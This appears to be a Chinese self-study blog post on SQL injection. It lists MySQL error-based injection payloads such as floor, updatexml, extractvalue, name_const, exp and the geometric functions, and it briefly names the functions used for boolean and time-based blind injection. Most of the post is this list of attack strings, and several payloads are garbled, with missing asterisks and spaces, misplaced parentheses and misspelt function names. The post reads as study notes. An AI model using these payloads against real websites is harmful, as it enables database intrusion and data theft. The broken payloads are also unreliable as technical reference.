渗透自学(五)SQL注入(三)

本文介绍了SQL注入中的报错盲注方法,包括floor、updatexml、extractvalue等多种技术,以及布尔盲注和时间盲注的运用。同时,讨论了如何通过WAF绕过策略,如数据大小写、编码解码、特殊符号利用、参数污染等手段,实现SQL注入攻击。还提到了数据库特性和多种数据库的注释符与空格字符,以及WAF防护中的逻辑问题和性能问题。
摘要由CSDN通过智能技术生成

第十六天(查询方式及报错盲注)

       当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。

       简单来说,就是不返回错误信息的,我们就想办法让他返回错误信息

       GET方法中,如果burpsuite在url上加空格,以(+)号代替空格表示

       得到的报错信息显示在网页源码上

       SQL注入报错盲注(有十二种)

  1. 报错盲注(报错回显)(优先)
    1. floor

and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

    1. updatexml

and 1=(updatexml(1,concat(0x3a,(select user())),1))

    1. extratvalue

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

    1. NAME_CONST

and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

    1. join

select * from(select * from mysql.user ajoin mysql.user b)c;

    1. exp

and exp(~(select * from (select user () ) a) );

    1. GeometryCollection()

and GeometryCollection(()select *from(select user () )a)b );

    1. polygon ()

and polygon (()select * from(select user ())a)b );

    1. multipoint ()

and multipoint (()select * from(select user() )a)b );

    1. multlinestring ()

and multlinestring (()select * from(selectuser () )a)b );

    1. multpolygon ()

and multpolygon (()select * from(selectuser () )a)b );

    1. linestring ()

and linestring (()select * from(select user() )a)b );

  1. 布尔盲注(逻辑判断)(其次)
    1. regexp
    2. like
    3. ascii

ascii()返回的是一个位号(0-127)可以从32到127

    1. left

left(obj,num)对obj左起至第num的字符串

    1. ord
    2. mid
  1. 时间盲注(延时判断)(最后)
    1. if

写法:select if(Condition,A,B)

              Condition为真返回A,否则返回B

    1. sleep

写法:sleep(5)

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值